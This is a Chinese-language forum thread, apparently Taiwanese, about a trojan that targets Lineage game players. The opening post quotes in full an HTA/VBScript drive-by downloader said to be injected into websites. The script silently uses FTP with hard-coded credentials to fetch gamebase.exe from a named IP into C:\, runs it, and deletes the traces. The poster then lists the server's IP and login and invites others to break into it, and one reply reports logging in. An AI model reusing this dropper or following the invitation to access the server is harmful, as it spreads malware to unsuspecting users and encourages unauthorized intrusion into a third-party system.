天堂木馬中的一個~!

wen1018

<HTA:APPLICATION caption="no" border="none" showInTaskBar="yes" windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")
t.WriteLine("nh")
t.WriteLine("nh")
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get gamebase.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\gamebase.exe"
fs.DeleteFile "163.txt",true
window.close
window.close
</script>

以上是他們在各大網站加的一段VBScript
可以知道他們是用FTP去抓檔的有

ip:61.163.238.51
ID:nh
PW:nh
檔名:gamebase.exe

小弟我沒能力進去~!
但可以知道他們是用server-U架的~!
也有用pcANYWHERE和Win2K的Terminal Server
請有能力的大哥連去玩玩~~!

sean1976

進去了...帳號和密碼都是nh...

wen1018

引用:

最初由 sean1976 發表
進去了...帳號和密碼都是nh...

我有寫了~!
但nh的權限不足~!
不能玩他們~!

Age

誰可以幫我解釋一下這段寫的是什麼意思啊？

wen1018

引用:

最初由 Age 發表
誰可以幫我解釋一下這段寫的是什麼意思啊？

那一段??
這個是會以FTP連到61.163.238.51
用ID:nh PW:nh 進入
從裡面抓個gamebase.exe 放到你的C:\下並執行它

jessee780522

好樣的IE..
VBScript還真是恐怖

隨便網站逛一逛都有可能慘遭毒手

freecool

這樣公佈程式碼
如果被有心人士拿去到帳號怎麼辦?

小熊逛大街

請問他是會在背景偷偷執行是嗎@@?
還真是恐怖阿...

sean1976 ☆ 日向 ☆	進去了...帳號和密碼都是nh...
	回覆

Age 會員	誰可以幫我解釋一下這段寫的是什麼意思啊？
	回覆

jessee780522 進階會員	好樣的IE.. VBScript還真是恐怖隨便網站逛一逛都有可能慘遭毒手
	回覆

freecool 會員	這樣公佈程式碼如果被有心人士拿去到帳號怎麼辦?
	回覆

小熊逛大街會員	請問他是會在背景偷偷執行是嗎@@? 還真是恐怖阿...
	回覆